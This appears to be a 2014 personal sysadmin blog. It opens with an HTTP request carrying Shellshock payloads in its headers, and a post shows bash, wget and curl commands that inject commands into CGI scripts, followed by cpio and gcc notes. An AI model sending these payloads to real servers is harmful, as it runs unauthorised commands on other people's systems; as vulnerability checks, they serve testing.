GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la
Referer: () { :; }; ping -c 23 10.1.1.1
Monday, September 29, 2014
thanks f5
Thursday, September 25, 2014
with a rusty spoon
well kids. this just sucks donkey balls.
get shell and issue:
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi
and better.
curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi
Wednesday, September 24, 2014
simple cpio script
rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
#!/bin/sh echo start "$(date)" >> /var/log/cpio.log ; find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ; echo end "$(date)" >> /var/log/cpio.log ;
Wednesday, September 17, 2014
install gcc notes
1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release
(To install SVN, see how to Work with SVN)
2) Check to make sure install.sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .
3) Sample config for SUSE 10 Linux, x86_64
me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local
--infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64
--enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0
--enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64
--with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind
--with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/
or...
1) Search for an rpm package for your specific OS, e.g.:
http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34
2) You can make a symbolic link to the newly uploaded gcc in /usr/bin
Subscribe to:
Posts (Atom)